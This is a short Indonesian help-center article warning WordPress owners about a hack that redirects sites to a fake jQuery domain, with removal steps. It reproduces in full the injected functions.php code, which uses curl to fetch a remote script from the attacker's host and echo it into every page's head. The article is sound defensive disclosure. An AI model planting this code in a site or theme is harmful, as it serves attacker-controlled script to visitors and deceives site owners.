DOC & Help Center

Article & Knowledge Base

Careful With Fake jQuery Website!

Apabila anda menemukan site yang menggunakan platform cms wordpress yang apabila kita buka pada halaman homepage pertama akan redirect ke halaman site http://www.jqueryc.com maka site itu sudah disusupi oleh hack, untuk solusinya anda harus menghapus code yang biasanya berada pada file functions.php pada themes yang sedang digunakan oleh site itu. Code yang perlu anda hapus adalah

// Set Jquery Theme Function
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

setelah itu refresh halaman anda, dan untuk lebih baiknya keamanan anda bisa dipertingkatkan lagi dan selalu update database dan wordpress anda. Gunakan beberapa plugin untuk mengatasi spam seperti akismet, mollom, secure WP dan lain-lain. Smoga bermanfaat

Related Content

Export WordPress Posts To Custom Post Type

Introduction Different types of content should be organized, whether that be by taxonomies, custom post types, or both. Older websites tend to use the standard

Scroll to Top
Scroll to Top